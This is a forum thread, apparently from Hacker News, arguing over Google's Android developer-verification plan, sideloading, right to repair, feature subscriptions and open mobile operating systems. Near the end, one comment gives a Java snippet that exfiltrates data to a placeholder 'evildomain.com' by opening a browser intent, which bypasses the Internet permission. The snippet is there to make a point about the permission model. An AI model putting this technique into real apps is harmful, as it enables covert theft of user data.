I think there is also still room to legally require a common SW-layer with respective documentation to utilize features of underlying hardware (optional without the shipped OS on top, disconnecting the device from the shipped ecosystem).
This would also make sense in order to prevent e-waste and put this old hardware to better use.
It's crazy to think how much computing power is just added to a drawer or landfill every day, just because there is no reason for the vendor to allow you to repurpose it.
I would e.g. LOVE a "Browser on everything" OS which just provides a Browser OS for outdated hardware, but the only way this could work on scale would be if the device-vendor would be mandated to provide and document the lower layer...
We live in a world where the top chip makers are being shaken down by the US government to keep access to markets because embargoes and tariffs. And where software developers have to have a live feed of what every user is doing to Brussels or be arrested.
The question of how private property, intellectual property and posession/ownership should work is indeed something humanity hasn't properly figured out yet.
But if anything, regular people should have more of the cake.
We have! The only problem is a very limited amount of legal decisions accidentally paved the way for a massive dystopia. In particular, the first sale doctrine [1] solves everything immediately.
The courts assumed good faith with a licensing exception, and maybe it was. But that opened the door to essentially completely dismantle the first-sale doctrine. Get rid of that loophole and all this stupidity ends, immediately. Well that and the DMCA. Once you buy something, it's yours to do whatever you want to do with it short of replicating it for commercial benefit.
You might be right. We're seeing a paradox of more and more exclusive ownership of property for commercial interests (land, water, airwaves, orbits) and fewer and fewer exclusive ownership for individuals (rented homes, licensed software, subscriptions etc). I too think we're still in a transition stage and humanity has yet to figure this thing out.
Not always. There have been car manufacturers that sold vehicles with features only enabled by a subscription. You may buy a car with heated seats, but the heated seats only work if the manufacturer enables them.
The heated seat is an edge case, but there is also the entirely valid argument that you shouldn't be able to arbitrarily modify your car (e.g. replace the breaks with some home-grown solution), as it can put yourself and others in danger, and I see no evil in that being enforced by the government. A more IT-related example might be what radio frequencies can we use - if anyone could spam the whole spectrum, we would lose more than from the "freedom" of being able to do that.
> there is also the entirely valid argument that you shouldn't be able to arbitrarily modify your car
In at least two european countries that I know of (but probably in all of them) cars need to pass periodic technical inspection to be allowed on the road. Breaks are tested, among other things.
Technical inspections are mandatory across the board in all of the European Union, although the rules (such as the interval between inspections), may differ between countries. The minimum is every two years, some countries do yearly. This is actually governed by a European mandate.
Considering the same law is used to strike a 3 hour GPU documentary over a ~30 second clip, I think it serves to corporate pretty well.
GamersNexus' 3 hour documentary about GPU smuggling (which is way more than a blog as HN commenters like to portray) is struck down by Bloomberg because they didn't want their 30 second clip, which is squarely fair use BTW, of POTUS speaking to be in that. GamersNexus repealed successfully, but Bloomberg tried to bully them [0].
Am I the only one that found that to be a reasonable edge case?
The seat heating was apparently shortening the life of the leather seats. Its cheaper to include heated seats in all cars, than it is to maintain 2 different sets of production. The subscription basically offsets the cost of needing to replace the seats more frequently when the heating is enabled.
Likewise, if you manually enabled the seat heaters, then complained that the seats were falling apart quickly, having given you a legal out to get that feature enabled in warranty, would not have to replace your seats for free.
Not to mention, they apparently already ditched the subscription over backlash.
> The subscription basically offsets the cost of needing to replace the seats more frequently when the heating is enabled
I never heard of car-manufacturers periodically replacing seats within warranty because of the wear of the material, regardless of being "more frequently" or not. This sounds like a massive oversight in product-design.
Of all the cases I know, the customer had to bear the cost of such "wear and tear" cases.
I would want the ability to change that. I actually think I can mess with that on my car.
>enabling the nominal power of your car instead of handicapping it by default?
Big topic for me. My car has a DPF, and appears to have been geared such that despite containing an automatic DPF burn process, the engine never quite reaches the required temperature, so I need to perform manual burns.
I have straight up asked the dealer for a method to enable the auto burn process, manually. And have asked if theres a retune available, to make the gearing just a little bit less efficient, giving me more power and more engine heat.
The issue, pretty much verbatim from their head regional diesel mechanic is that any modifications of that nature would fuck the emissions standards they had to limbo under. So its categorically denied. They also issued me with stern official warnings that anything I do to make the car more reliable may also void my warranty. And the unofficial advice I have received is that the DPF is "f*cked mate" and to "get the petrol hybrid before the government forces it to wear a similar PPF"
The car also very suspiciously moderates the engine output unrelated to gearing/tune. Just sometimes underperforms at random. I believe its computational again, like you say, handicapping it for emissions reasons.
These things are largely optional for me, but I wont mess with them too much until I am out of warranty.
> I would want the ability to change that. I actually think I can mess with that on my car.
Yes, generally you can disable on demand, but Volkswagen now sells the feature as a subscription. So you need to pay to enable. Maybe this is because it reduces the lifespan of the LEDs. Who knows.
> handicapping it for emissions reasons.
Volkswagen sells you another subscription for that now, at least for their electric vehicles. You can buy the option if you want your EV to perform as it's designed.
Emissions is a completely different beast. However their 140HP and 170HP TFSI engines had no different parts rather than the mapping.
Manipulating engines in a way which alters their carbon footprint is a sensitive topic, and while I was positive towards diesel systems, the particulate matter they emit, the fog they cause (see Paris photos, it's eye opening) and German engineering at its finest (i.e. Dieselgate scandal) soured me from diesel's automotive applications, big time, permanently.
This is the same argument people make between Apple and Android.
Can I use an Android phone without using Google? Yes, of course you can. There are plenty of secure OS's like Graphen, Lineage, Calyx and many others. Do people really care enough to use them? Hardly any, which proves my point.
Same thing here. Most people will just pay the fee to get the seats. Some might just opt out and not get them. Others will shop around and find some legacy cars that are older that have them but don't require a subscription.
At the end of the day? There's ALWAYS a choice. How hard do you want to look to avoid the subscription? Is it really worth your time and effort? Some would say yes, the vast majority really DGAF. People have been lulled into not caring about stuff like personal privacy and having a say in what's being peddled to you.
I see no other way than regulation to force the two to provide drivers and manuals for alternative OS makers.
We should've nipped it with Apple, but there was so much _whatabout_ing that the conversation always go sidetracked with assertions about the free market and what not. It turns out, there is no free market, and we're just living in someone's managed device walled garden.
That's not what it's ever actually about. You're buying a disingenuous framing that pins blame on the bottom when all these harmful trends come from the top. This isn't to protect grandma, it's to protect Google. This is always what happens when you allow pockets of power with interests misaligned from those of most people. The pockets of power get their way, and people are worse off.
The thing is, even if Google has a hidden motive in this case, the prevailing public morality doesn't allow you to argue against a measure designed to protect the weakest and poorest among us. Once a vulnerable group has been invoked, the public stops caring about their rights, the cost-benefit balance and most other rational concerns.
I think the phenomenon is most visible in the United Kingdom. Not just with respect to the recent age verification measures, but also with respect to the government's recent financial misadventures.
Of course it's a disingenuous framing. A certain kind of person is both attracted to power and deathly afraid of people voicing unapproved opinions "outside their kitchens".
Things can have multiple justifications, some public, some not: some conscious, some not. Central control and a feeling that a parental figure is in control of the tribe primes, at a primal level, a certain kind of person to like an idea. The specific post-hoc justification is almost incidental.
That said, such things need a semblance of legitimacy to work. It'd be much harder to crack down on general purpose computing under the guise of safety if we had cultural antibodies agains safetyism in general.
It's just not possible to prevent mistakes while letting people color outside the lines. Most brilliant ideas look like stupidity at first. I want to live in a world that biases towards discovery over safety.
There is not much to discover from e.g. not using seatbelts. There is absolutely a need to protect a population from itself which should cover certain stuff, while not others.
> There is absolutely a need to protect a population from itself which should cover certain stuff
No, there isn't. I'd much rather live in a world where we were able to make our own decisions about personal safety, regardless of how poor those decisions are.
There's a direct line from mandating seatbelts to mandating developer certificates. If you accept in one domain that it's legitimate for power to reduce freedom to protect people from themselves, you'll accept it in every domain.
Look: in order for a mandate to be justifiable, it needs to at least provide superlinear benefit to linear adoption. That is, it has to solve a coordination problem.
Do seat belts solve any coordination problem? Do they benefit anyone but those wearing them? No. Therefore, the state has no business mandating them no matter the harm prevented.
A certain kind of person thinks differently though. He sees "harm" and relishes the prospect of "protecting" people from that "harm". They don't recognize the legitimacy of individual bad decisions. The self is just another person trying to hurt you. This kind of person would turn the whole world into a rubberized playground if he could.
Sure. You will have the right to root, unless on a device with a locked bootloader. /s
Lets just call it what it is and what we all want. "The right to modify". It doesn't give you the right to copy, so it will never break any law protecting intellectual property.
That doesn't make sense. How do meet your own needs and desires if you can't use your own property the way you want?
And isn't the point in this very situation that people simply can't buy what they want because Google and Apple are a duopoly and now Google is going to follow the path of restricting what you can do with your own property?
If I were in the 0.01%, savings wouldn't be a thing. I wouldn't even need a home. Just go around staying wherever I like for as long as I like doing whatever I want. I wouldn't really care about what google or apple does with their devices, who attacked or defeated whom and all that bs because I wouldn't be in survival mode.
At least this is probably how people in charge of enshittification think like.
This is based on the false assumption that the free market solves every problem.
But the reality (which was correctly identified by Adam Smith himself) is that the effort required to enter a market can sometimes be so high, that we practically end up with oligopolies, see mobile OSs. They require a network effect to make sense, so the entry cost is not just developing the product, but also to somehow convince basically every other player to consider you a target platform - which is a cyclical problem that you can't just bootstrap yourself into. Even Microsoft failed at it, even though they were paying hefty sums to companies for apps working on their OS.
If this is a thing then the solution they offer is incorrect. A big giant red screen: “warning the identity of this application developer has not been verified and this could be an application stealing your data, etc” would have worked.
What they want is to get rid of apps like YouTube Vanced that are making them lose money (and other Play Store apps)
> What they want is to get rid of apps like YouTube Vanced
I think it is also very telling where they're rolling out first. Brazil, Indonesia, Thailand, and Singapore.
It felt weird that the official press release was quoting entities from these countries, as if it should give confidence to the rest of the world. I can't imagine what these countries would want with apps that can be traced back to a government id...
Vanced and such is more of a First World/Western issue. I don't think you're wrong but I got a strong gut feeling there's other pressures in the works. Just something doesn't smell right...
In addition to the other perspectives already offered here, warning screens such as the one you propose were already shown for sideloaded apps, and these screens worked against Google in their lawsuit with Epic Games. So that's another contributing factor for the policy we're discussing.
If a giant red warning saying 'THIS APP MAY BE MALWARE' doesn't stop someone, then they've either made an informed choice to proceed or it's willful negligence. In other words, users aren't 'trained' to ignore warnings; they're simply being willfully negligent.
This is something laughable that Apple does. Anytime you install something from Github it'll make you click a few extra boxes. And their tightening down of things also ends up making people look for third party software in the first place. All this really does is, like you said, teach people to ignore warnings.
The way we allow paternalistic tech companies to train the consumer to abdicate personal responsibility is going to bite us in the ass sooner or later. I'm betting on sooner.
It's such a simple and effective solution that could be implemented overnight and 'help to cut down on bad actors who hide their identity to distribute malware, commit financial fraud, or steal users personal data' tomorrow. Mission accomplished, internet saved, and everyone's happy just like a fairy tale out of the early 2000s.
People have no "control" over their own device if they have malware on it. The weirdo incoherent tech-chauvinism of "control" and "freedom" evidenced all over this thread is one of the most obnoxious trends on HN.
The funny thing is Stallman started his fight like half a century ago and on regular days Hacker News shits on him eating something off of his foot and not being polished and diplomatic, and loves practical aspects of Corporate Open Source and gratis goodies and doesn't particularly care about Free Software.
On this day suddenly folks come out of the woodwork advocating for half baked measures to achieve what Stallman portrayed but they still hardly recognize this was EXACTLY his concern when he started the Free Software movement.
It's possible to believe both that Stallman is over the top and that stuff like this Google action is bad, and even to be right on both. It's even easier to believe that Stallman has had some good ideas but is still a deeply flawed human being, and has also incidentally not been the most effective advocate for his own ideals.
It is possible, sure, but I have a feeling it goes unrecognized how prophetic and precise his concerns were, and that this is very similar to his original issue with the closed-source printer software he was not allowed to fix, and he does not get credit for his predictions, as people simply pass by, and not connect it to the Free Software issue, when issues like this happen; meanwhile he takes all the downsides of being brash and anti-corporate, which is taken advantage of by the Corporate Open Source crowd.
I shit on Stallman because he fights quite vocally against singular they and neopronouns, and invents his own replacement for it. A cause no one needs his opinions on and a solution no one in the community wants.
It just seems needlessly pedantic and irritating to go to a minority group and say, "you minority group are doing your culture wrong". It, perhaps much more problematically, encourages others to feel like they should drive by trans and non binary communities and tell those communities about how they are doing language wrong.
He also said he was "skeptical that voluntary pedophilia harms children." There's a lot to unpack there, but that's a pretty deeply fucked yup thing to say.
The foot stuff is a quirk. Kind of an icky quirk, but whatever. Those other critiques are very reasonable reasons to be uncomfortable lionizing rms.
I think his proposal to use "per" instead of "they" actually makes a lot of sense, because "they" is very confusing in a lot of contexts, because it's a word already used for another function. I don't see how you perceive that as something negative.
The quote about pedophilia is concerning indeed, but I think that rather stems from ignorance about the issues than promoting pedophelia. It's easy to shit on such things and wokely dismiss someone's entire opinion, which I find a bit weak.
The guy quite obviously is diversely talented. A computer genius, but well below generally agreed upon levels of mental deficiency in areas that most people care about.
This is really bad. I think that most people on HN will agree with that.
The problem is that most normal people (HN is not normal - mostly for the better) don't even understand what sideloading is - let alone actually care.
How can we fix this?
(aside from making people care - apathy enables so many political problems in the current age, but it's such a huge problem that this definitely isn't going to be the impetus to fix it)
This certainly won't solve the problem, but I would at least like to banish the term "side load", which is a kind of Orwellian word that takes something everyone used to do all the time and makes it sound obscure and a bit nefarious. Maybe we, the tech literate, can start calling sideloading a "free install" or something. When asked, we can clarify that the 'free' stands for both freedom, and not paying middlemen 30%.
This is a great point. Not sure if it’s possible, would be great if there was some way to reclaim the notion of installing software as a general practice, regardless of whether a computer is “mobile” or “desktop”.
Like people still download software packages from the web on Windows, MacOS, and Linux… right? Maybe hard to grasp for the kids that grew up with tablets with no notion of a file system, idk
People install games from Steam or the Epic Store on their computers without Microsoft preventing that or taking a cut all the time (not for lack of trying. I know). But somehow, in the mobile world, we went with total lockdowns and platform extortion as the rule?
> People install games from Steam or the Epic Store on their computers without Microsoft preventing that
microsoft wishes they could have the level of platform control that google/apple on mobiles have.
It's pure luck that the IBM-compatible PC was not locked down and restricted, because at the time IBM had not thought of it as being important. When it became clear that it was a lost profit opportunity, the cat was already out of the bag and so IBM had no choice.
Microsoft repeated the same "mistake". But apple learnt, and google also from apple.
I agree that this is a horrible step in the wrong direction but in terms of the solution I have a different take.
I don't think that making "normal" people "care" about sideloading is the answer, because a) it's impossible and b) political change doesn't happen through "normal" people anyway, all political and regulatory change is driven via smaller and motivated groups of people.
The problem is fundamentally that there's a duopoly on mobile OSes that has tons of market power and if they want to dictate a change like "you can no longer install unapproved software," they can just do it.
The solution is to walk away from that duopoly, to suck it up and just stop using their products. We fortunately are able to do this (for now) on desktop and running Linux in 2025 is better than it's ever been, and more people are doing it.
To get Linux or some alternative on phones is a big task, and if you make the switch you're going to lose a lot. But most of what has no desktop equivalent is addictive social media garbage that you should get rid of anyway. The biggest thing I'm concerned about is the state of banking and OTP/2FA.
I think we need to fight for universal electronic access to the financial system as a right without a need for gatekeepers like Apple or Google. In some countries it's already the case that at many businesses you must use your phone to make payments, cash is gone, cards are dying, and you must therefore agree to Apple or Google's rules to use your phone. This is truly how freedom and democracy will die if we allow it. This is way bigger for "normal" people than technical concepts like sideloading. People on the left should inherently understand the importance to liberty of having the right as an individual to buy and sell without some megacorp's permission. For people on the right, well, remember the Bible's "Mark of the beast..."
Secondarily we need to fight for the enforcement of anti-trust laws, which half of HN doesn't seem to even know exist, or feels are in some way unfair, even though they are the cause of these problems. Government needs to reach in and rearrange markets that are dominated by one or two players, it needs to forcefully restructure those companies so that they lose their market power and can no longer force citizens to obey their will. We've done it before, such as ending company towns where you were forced to use the company's scrip at the company's shop to buy living essentials. It's worked, we need to do it again.
I can do banking and otp at home with a 100 Euro phone that I use only for that. FB, TikTok, Instagram, etc, neve ever installed them on my devices.
The problem is that I want to make calls, SMSes, use WhatsApp and Telegram, Maps and OSMAnd, NewPipe, VLC, Syncthing and a few others on the phone I carry with me.
And to make matters worse I don't want a huge, thick and heavy brick like every Linux phone I read about. I'm on a Samsung A40 now and it's not easy to find a replacement with similar size and weight.
How are you going to buy things when you leave home?
In the country I live in, which is a highly online and highly mobile first country, a sizeable minority of businesses no longer accept cash. A few no longer even accept cards.
At these businesses, there is only one way to pay, which is to pull out your phone, and initiate a transaction through your mobile banking app, you scan a QR from the vendor and approve the transfer.
Mobile banking is so ubiquitous that often these businesses don't even have signage outlining their payment policies, or it's tiny and hard to find.
Some banks do not have an online banking website, the only way to access your money and make a payment is to use the Android or iOS app on an unrooted device, or physically go to a branch or ATM.
You go somewhere, you buy, at the end of your meal or whatever they tell you phone only, no card, no cash.
It's prevalent enough that being outside of your home without an unrooted Google or Apple operating system physically on your person is a significant impediment to buying basic things, like a meal.
Apple and Google will, through a variety of technical changes, seek to make this the case in all of the world, and in some countries they'll succeed. So the important question now is: how will it go down in the next 10 years in your country? How far under their control is your society going to fall?
Banking, money and payments. Limiting those in the name of security is how they will get you on everything else.
They will take away cash and cards and there will only be payment apps, on approved secure OSes which you can't "tamper" with (aka install "unauthorized" software like VLC or a Youtube alternative on), or else the payments apps stop working.
They will take away SMS OTP and there will only be TOTP, because it's more secure. Then they will replace the OTP with a facial scan, because it's more secure, people were being social engineered into giving someone those numbers over the phone, etc.
This is all in process. They don't even hide it, they just say it's for security. It is already happening in countries that are highly online and highly phone-centric.
> You go somewhere, you buy, at the end of your meal or whatever they tell you phone only, no card, no cash.
Note that this is likely illegal, even though I'm sure it's very common in certain places, and arguing about legal tender laws is not how you want to spend every meal of course.
But, in principle, in most countries at least, businesses and private citizens are obligated to accept the country's currency to discharge debts. They're free to have an upfront no cash policy, and refuse to do business with you if you try to pay with cash, for example making you leave all your groceries at the checkout counter. But if they claim that you have a debt to them, such as a meal you've already eaten and now must pay for, they must accept any form of the country's currency, such as cash, as a means of you paying that debt off.
> I can do banking and otp at home with a 100 Euro phone that I use only for that.
That doesn't solve anything, though. If Google revoked your Google account and refused to open a new one, you'd be SOL - you'd either have to buy an iPhone, or move banks until you find one that gives you a physical TOTP (since many just have apps already, but those apps don't run unless downloaded from the Google or Apple stores).
Telegram's clients are open-source, and there's plenty of non-official ones, but for other proprietary messengers you're SOL.
Hard to believe at this point that these messengers used to use open standard protocols, and you could send messages from Google Talk to Facebook once.
> I don't want a huge, thick and heavy brick like every Linux phone I read about
While I understand your point, are you even going to notice after a couple of weeks of daily driving? Let’s not underestimate our ability to get used to things.
Valve has managed something similar with SteamOS as well as Proton built on Wine to make Windows games run on Linux, performing as good as or often better than an actual (modern) Windows install.
It's the mobile hardware drivers (such as for the modems and 5g etc) that likely roadblocks - these hardware manufacturers probably have some sort of OEM agreements, and so cannot opensource these drivers for all devices.
I would wish that mobile devices' specs and hardware drivers are all available, so that i am not dependent on the manufacturer supplying a compatible OS.
I agree with you idealistically, but practically, creating an entirely new mobile OS with market share competitive with the existing two is an unbelievably massive challenge. It'd probably be just about as easy to get people to care about sideloading in the first place.
Remember how Android used to be an open source project and how we had Google backing AOSP? I think it's time we we maintain the latest fork and just use that instead.
That only solves the OS side of things, but doesn't give you a good ecosystem. Unfortunately and increasingly bigger number of apps rely on Google services and attestations, meaning you need a Google approved software to run them.
Is AOSP no longer a thing? I've been using GrapheneOS for a few years and admittedly lost track of AOSP, I just assumed it was still a thing despite Google generally wanting to control more and more.
Google now only drop through source code after a release, not during development. Also, much AOSP functionality has been moved to Googles Play Services which is closed source.
That's not the problem. It's the bootloader locked hardware and the TPM anti-"tampering" security verification that more and more apps require.
It's not just the OS makers. They're also responding to the demand of companies and governments to control their users through them. They will not say "no".
We used to have strong consumer protection advocates on both sides of the Atlantic, and those consumer protection advocates used to influence laws and regulation which forced corporations to stop doing anti-consumer stuff like this. Those days can return with enough organized labor and solidarity among the working classes.
I had to do some light research on Wiki, but it looks like Firefox OS was supposed to fill part of this void. Sadly, it was not successful, and the project lost funding and support from Mozilla. I think if Mozilla could not do it, it seems hard to imagine there is an open source org with more talent and money than Mozilla who can make it work.
Sailfish tried and failed. Various Linux distro also tried and failed even harder. Consumers at large just aren't interested in anything other than iOS and Android.
The problem is - linux (outside on server land and maybe SteamOS) is everything but (regular) user friendly.
When people buy a new phone the expect a smooth experience without any major inconveniences and uniform UI. And apps. Lots of apps. Full of features and mature UI. Linux mostly have none of it.
Users need a new feature or a new power to justify transition. Learning of new OS is not free. Someone should reuse Android UI, but upgrade the OS to full Linux.
There's already open source OSes that run on phones that aren't based on Android.
Off the top of my head there's a Debian based one, a Fedora based one, webOS, PostmarketOS, probably others. Wouldn't be that difficult but yeah, the cost of entry is still probably tens of millions.
This is also no long term solution. GrapheneOS can't diverge from Google android to much, otherwise modern apps stop working. And Google will definitely go for alternative roms next.
> most normal people... don't even understand what sideloading is
Actually, they understand it just fine. The concept is very simple too.
Before this change you could install Android apps without registering your passport/driving license with Google.
After this change you will have to tell Google your real name and home address to install anything on your Android device. This is all. It can take a convoluted form of registering Google account or a more direct form of sending Google your identity documents to confirm "developer privileges". But you will no longer be able to use non-hacked Android devices to install anything without doing those steps.
P.S. I recall that some people still believe that they can create Google account without giving Google your personal details, phone etc. This is simply a self-delusion. If Google does not immediately demand you to cough up a phone numbers under pretense of "suspicious activity", that's because they already know who you are (you probably told them yourself by registering another account elsewhere).
No, "burner SIM cards" aren't real. This is just another form of self-delusion, — this time architected by US security agencies. You don't become anonymous by using those, you become watched.
Define "normal people".
Due to Chinese phones and sanctions and other geopolitical bullshit a significant part of the world is forced to use alternative app stores already. Yes, these people are very aware of "sideloading". (Due to Google's own previous moronic foot-shooting policy.)
turn people onto sideloaded apps. show them Revanced and NewPipe, show them system-wide ad blockers and bloatware removal and every other thing Google doesn't want plebs to use.
people don't care about "apk side-loading," they care about apps. hook them on forbidden apps, and they'll raise hell when they can't side-load them anymore.
Personally...we all know the Play Store is chock full of malicious garbage, so the verification requirements there don't do jack to protect users. The way I see it, this is nothing but a power grab, a way for Google to kill apps like Revanced for good. They'll just find some bullshit reason to suspend your developer account if you do something they don't like.
Every time I hear mentions of "safety" from the folks at Google, I'm reminded that there's a hidden Internet permission on Android that can neuter 95% of malicious apps. But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.
> we will be confirming who the developer is, not reviewing the content of their app or where it came from
This is such an odd statement. I mean, surely they have to be willing to review the contents of apps at some point (if only to suspend the accounts of developers who are actually producing malware), or else this whole affair does nothing but introduce friction.
TFA had me believing that bypassing the restriction might've been possible by disabling Play Protect, but that doesn't seem to be the case since there aren't any mentions of it in the official info we've been given.
On the flip side, that's one less platform I care about supporting with my projects. We're down to just Linux and Windows if you're not willing to sell your soul (no, I will not be making a Google account) just for the right to develop for a certain platform.
It's never about security (at least not user's security). It's like you pointed out only about power and locking in customers. They don't care if your phone gets hacked or you bank account drained. They care about the bottom line. Android is fine. Google should have 2 layers if they're worried playstore 1 has only well vetted authors and apps. playstore 2 can be the free for all (mostly) of the current store. These could be two different apps or prominent tags. Choice is good, lock down is bad. Corporate does not like employees or customers to have freedom, that's why it's our duty to fire people like the current US regime who always side with corporations over customers.
The thing is that people sideloading good non-malware apps because they want to is also a thing, and all kinds of icky apps that abuse permissions but are still verified and installed through the Play Store are also a thing. This doesn't really change what is a thing. It just moves more stuff under Google's control.
security is the "Save the Children" of technology. It's not that there isn't a theoretical thing there, it's that in the real material sense, the actual actions taken are power grabs for control and suppression.
> Attackers convincing users to side-load malware is a thing.
Sure. It’s also not Google’s problem.
It’s not Victorinox’s problem of someone uses a Swiss Army knife to cut someone else. It’s not Toyota’s problem if someone deliberately runs over a pedestrian.
Car companies do care if their cars are easy to break into and will improve the security of newer models, even if any particular theft is not their fault.
If they don't do that then their reputation will suffer and governments might take notice. So, in practice, big companies do have to care about their users, not individually but in aggregate.
That's a bad analogy. No one is complaining about Google providing Android security updates.
This is like a car manufacturer preventing the installation of all unapproved aftermarket accessories by claiming they're protecting you from a stalker installing a tracker on your car.
I don’t actually think it’s that bad. If all of a sudden we started hearing an awful lot about Android phones having viruses, to the point where almost everyone had a friend who got a virus on their android. I think the market would actually shift. We’d probably see more people moving to iPhones.
> Car companies do care if their cars are easy to break into and will improve the security of newer models, even if any particular theft is not their fault.
Didn't Kia go over a decade without caring or improving until the Kia Boys stuff?
> Every time I hear mentions of "safety" from the folks at Google, I'm reminded that there's a hidden Internet permission on Android that can neuter 95% of malicious apps. But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.
You've never needed the internet permission to exfiltrate data. Just send an intent to the browser app to load a page owned by the attacker with the data to be exfilled in the query parameters.
It'd launch the browser app. You can have your evil page redirect to a benign page so it just looks like Chrome randomly opened or whatever. It is not as powerful as full network access as you can only send so much information in query parameters, but if you are doing some phishing or stealing sms 2fa codes or whatever then it is plenty to send back whatever payload you wanted to.
And of course basically every app requires internet permissions for ordinary behavior. The world where an explicit internet permission would somehow get somebody to look askance at some malware that they were about to download is just not believable.
> had me believing that bypassing the restriction might've been possible by disabling Play Protect, but that doesn't seem to be the case since there aren't any mentions of it in the official info we've been given.
I don't think we can know for sure before the change is actually in place. Going through Play Protect would certainly be the easiest way of implementing this - it would be a simple change from "Play Protect rejects known malware" to "Play Protect rejects any app that isn't properly notarized". This would narrowly address the issue where the existing malware checks are made ineffective by pushing some new variant of the malicious app with a different package id.
It's a big change for the ecosystem nonetheless because it will require all existing developers to register for verification if they want to publish a "legit" app that won't be rejected by any common Android device - and the phrasing of the official announcements accurately reflects this. But this says nothing much as of yet about whether power users will be allowed to proactively disable these checks (just like they can turn off Play Protect today, even though very few people do so in practice).
> This is such an odd statement. I mean, surely they have to be willing to review the contents of apps at some point (if only to suspend the accounts of developers who are actually producing malware), or else this whole affair does nothing but introduce friction.
Requiring company verification helps against some app pretending to be made by a legitimate institution, e.g. your bank.
Requiring public key registration for package name protects against package modification with malware. Typical issue - I want to download an app that's not on available "in my country" - because I'm on a holiday and want to try some local app, but my "play store country" is tied to my credit card and the developer only made it available in his own country thinking it would be useless for foreigners. I usually try to download it from APKMirror. APKMirror tries to do signature verification. But I may not find it on APKMirror but only on some sketchy site. The sketchy site may not do any signature verification so I can't be sure that I downloaded an original unmodified APK instead of the original APK injected with some malware.
Both of these can be done without actually scanning the package contents. They are essentially just equivalents of EV SSL certificates and DANE/TLSA from TLS world.
> Typical issue - I want to download an app that's not on available "in my country" - because I'm on a holiday and want to try some local app,
The solution here is just to get rid of artificial country limitations which make some users download APKs. None of those make sense in the online world anyways.
You can install unsigned apps on Windows just fine, maybe with one extra nag screen. Plenty of large open source projects don't sign their installers - VLC being one big example that many normal people use.
<< we will be confirming who the developer is, not reviewing the content of their app or where it came from
To be honest, it almost makes me wonder if the issue here is not related to security at all. I am not being sarcastic. What I mean is, maybe the issue revolves around some of the issue MS had with github ( sanctions and KYC checks ).
There's a reason Google is targeting a few specific countries with this first. Malware from APKs downloaded from the internet is more prominent in some countries than in others. The governments themselves are asking for this because educating the public has turned out to be an impossible task for them.
Still an awful solution that will get bypassed easily, of course. But there's more to this than "Google decided to be a bunch of dicks today".
Google also used to show you which apps used Internet permission in Play Store. But they removed it, which makes it harder to notice which apps don't use it.
Google mostly doesn't let you deny permissions while running apps that require them; recently there's some permissions that you can pick at runtime. So it's not suprising that they don't let you deny this one, when they don't even show it in the store.
> Every time I hear mentions of "safety" from the folks at Google, I'm reminded that there's a hidden Internet permission on Android that can neuter 95% of malicious apps
Of that they still refuse to sandbox the play store.
It's easy to see that there's a pattern on what they are copying from GrapheneOS.
> But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.
The internet permission has nothing to do with ads? It's a hidden permission because:
1) Internet connection is so ubiquitous as to just be noise if displayed
2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar
It absolutely has to do with ads. While there are various ways to exfiltrate small amounts of data, the non-collaborative ones are rarely silent and most importantly, they won't let the app get responses (e.g. ads) back.
The main thing this permission would be used for would be blocking ads. Also distinguishing shitty apps that are full of ads from those that aren't. If there is a calculator that needs Internet and one that doesn't, which one are you going to use?
> The main thing this permission would be used for would be blocking ads.
This permission has existed for longer than runtime permissions. You have never been able to revoke it, it was just something you agreed to when you installed the app or you didn't install the app.
It was "removed" in that era because if every app requests the same permission, then nobody cares about it anymore. When every app asks for the same thing, users stop paying attention to it. So no, it had fuck all to do with ads because that was never a thing in the first place. And ad blocking doesn't require this permission, either.
> Also distinguishing shitty apps that are full of ads from those that aren't. If there is a calculator that needs Internet and one that doesn't, which one are you going to use?
You can still use it for this. Apps are required to declare the permission still, it's listed on the Play Store under the "permissions" section. Similarly the OS reports the same thing. Presumably F-droid or whatever else also has a list of permissions before you install, and it'll be listed there.
Although Google's own Calculator app requires Internet permission. Take that for what's it worth.
> 1) Internet connection is so ubiquitous as to just be noise if displayed
That doesn't make it any less useful.
> 2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar
I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it. But even if it is flawed, don't you think Google would be a bit more incentivized to make the Internet permission work as expected if people could disable it?
> I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it.
Uri uri = Uri.parse("https://evildomain.com/upload?data=DATA_GOES_HERE);
Intent i = new Intent(Intent.ACTION_VIEW, uri);
startActivity(i);
Happily uses the browser app to do the data send for you. Requiring apps to have all the permissions of the recipient of an Intent before being allowed to send it would be a catastrophic change to the ecosystem.
The effect of this would be to make all apps request all permissions because even if you are just using some other app for a particular feature you need, you have no control over what other permissions they might add which would suddenly break any intents you send them. The only defense would be to request everything.
You could very specifically ban ACTION_VIEW intents for web URIs from apps without an internet permission I guess. But does banning apps from linking to the web (to be opened in browsers) really seem like a good idea?
Similar changes have been done before, the security sandbox behaves differently based on the app's minimum/target API level for backwards compatibility.
That's also why there's a warning before installing really old apps, they may run with extra permissions.
"Pop up a permission prompt every single time an app links out to a browser" is not going to be a thing that users like.
Yes, this is a little suspicious. But you just have the evil page redirect to google.com or something benign. To the user it looks like "huh, chrome just opened on its own."
I mean, I just did a quick look over the installed apps on this phone and ~1/4 of them would work perfectly well without an internet connection, things like a level or GPS speedometer that use the phone sensor or apps for Bluetooth control of devices [like 0] . Why would something like a bubble level app need internet access for anything besides telemetry or ads? I realize I have way more of these types of apps than the average user, but apps like this aren't a super-niche thing that would be on 0.1% of devices.
I just tend to give Google little benefit of the doubt here, considering where their revenue comes from. Same as when they introduced manifest v3, ostensibly for security but just conveniently happening to neuter adblocking. Disabling access to the internet permission for apps aligns with their profit motive.
There's plenty of actually problematic stuff Google does (like this change in the article), there's no need to make up whack ass conspiracy theories, too.
The internet permission is the only regular manifest permission you can't toggle in the settings. It is an obvious win for an advertising/surveillance company like Google. What is wack about it?
> The internet permission is the only regular manifest permission you can't toggle in the settings.
That's not even a little bit true? There's a ton of 'normal' permissions, almost none of which are user-overrideable. Like, say, android.permission.VIBRATE. Or android.permission.GET_PACKAGE_SIZE. Android has an obscene number of permissions ( https://developer.android.com/reference/android/Manifest.per... ) and almost none of them have a UI to control them nor any ability to be rejected
> It is an obvious win for an advertising/surveillance company like Google. What is wack about it?
